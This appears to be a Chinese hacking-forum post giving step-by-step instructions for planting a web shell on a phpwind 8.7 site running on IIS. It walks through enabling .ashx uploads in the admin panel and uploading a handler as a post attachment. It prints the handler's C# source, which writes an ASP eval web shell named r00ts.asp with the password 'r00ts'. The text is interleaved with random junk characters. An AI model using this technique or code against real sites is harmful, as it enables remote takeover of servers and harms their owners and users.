找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2115|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
7 q7 P! t# L+ o) p / ~* C4 w! e4 ]; T5 g, T0 N6 E" ]
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx. i6 T- h" `7 Z) \$ I

3 W+ M- v" B5 S2 t: N* ^" X发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整8 `5 P3 Z1 \" j0 m% e4 Z+ q

! a; W3 D; I4 ^$ D. k5 \然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx7 E. }* ]  W% T9 R' d5 i2 |5 A
7 b1 p& \8 f  J- e
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
* r9 P3 z  Q% L3 c1 e 4 e1 N* d& z1 c* d1 P/ F2 J
下面是代码:" X) l; K9 T  Q

# l6 ?' E1 ]" G6 w6 k( _" @6 \0 E  p<%@ WebHandler Language="C#"Class="Handler" %>$ `$ \! {! ^; m& y6 X4 B
using System;- j3 x2 |0 W/ }; X% d
using System.Web;
( u- d' ~+ G6 P9 \5 `/ wusing System.IO;. N5 \$ A5 y* o% v" ?
public class Handler : IHttpHandler {5 S6 {; b! R5 @7 T. l
public void ProcessRequest (HttpContext context) {+ P& n0 _4 V8 e2 H0 t
context.Response.ContentType = "text/plain";7 }  n7 ~8 L! ]
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));/ [9 u* S4 F& g$ [) s5 x; T
file1.Write("<%eval request(\"r00ts\")%>");# H1 |/ \. y5 N, c# x0 R
file1.Flush();
4 U; D2 r( ^* h' cfile1.Close();
8 T- s2 a7 G: C* W}
6 A2 ~+ ~/ W! A0 H9 Rpublic bool IsReusable {
+ _4 ~5 a  v# ]* T3 o/ y" n  b) |get {% m& E9 c4 q9 m) j. W7 X
return false;
7 e. z6 H) U% [7 M" P( s}
5 @) _1 P7 @- H1 i$ T+ U}
, c3 k& I! ]1 Y: n" n4 H: a}. q, K) x* `, T2 x6 m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表